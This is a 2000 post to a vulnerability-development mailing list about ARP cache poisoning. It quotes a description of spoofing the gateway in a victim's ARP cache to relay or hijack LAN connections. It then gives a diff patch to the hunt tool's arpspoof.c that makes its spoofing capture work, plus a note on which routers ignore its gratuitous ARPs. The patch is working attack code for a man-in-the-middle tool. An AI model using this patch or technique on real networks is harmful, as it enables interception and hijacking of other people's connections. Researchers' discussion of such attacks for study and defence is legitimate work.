From: Granquist, Lamont [lamont@ICOPYRIGHT.COM]
Sent: Thursday, February 03, 2000 11:16 AM
To: VULN-DEV@SECURITYFOCUS.COM
Subject: Re: More on ARP cache poisoning

On Wed, 2 Feb 2000, Sebastian wrote:
> Yea, this has been in use for like 3 years now, just grab hunt and ARP relay
> external connections by ARP spoofing the gateway. There is no problem with
> redirecting/relaying/denying any TCP connection within a switched/non-switched
> LAN when there are no static ARP entries. Just ARP spoof the gateway address
> into the victims cache and have ip forwarding enabled.

You also need the following patch for hunt 1.3:

--- arpspoof.c~	Sun Oct  3 10:16:35 1999
+++ arpspoof.c	Sun Oct  3 10:16:58 1999
@@ -432,8 +432,8 @@
 	list_lock(&l_arp_spoof);
 	list_iter_set(&li, &l_arp_spoof);
 	while ((asi = list_iter_get(&li))) {
-		if (p->p_iph->saddr == asi->dst_addr &&
-		    p->p_iph->daddr == asi->src_addr &&
+		if (/* p->p_iph->saddr == asi->dst_addr &&
+		    p->p_iph->daddr == asi->src_addr && */
 		    memcmp(p->p_ethh->h_source, asi->dst_mac, ETH_ALEN) == 0 &&
 		    memcmp(p->p_ethh->h_dest, asi->src_fake_mac, ETH_ALEN) == 0) {
 			packet_want(p);

(if that doesn't apply you probably lost the tabs)

I've also found that Cisco 2621s don't seem to accept the gratuitous ARPs
that hunt sends out.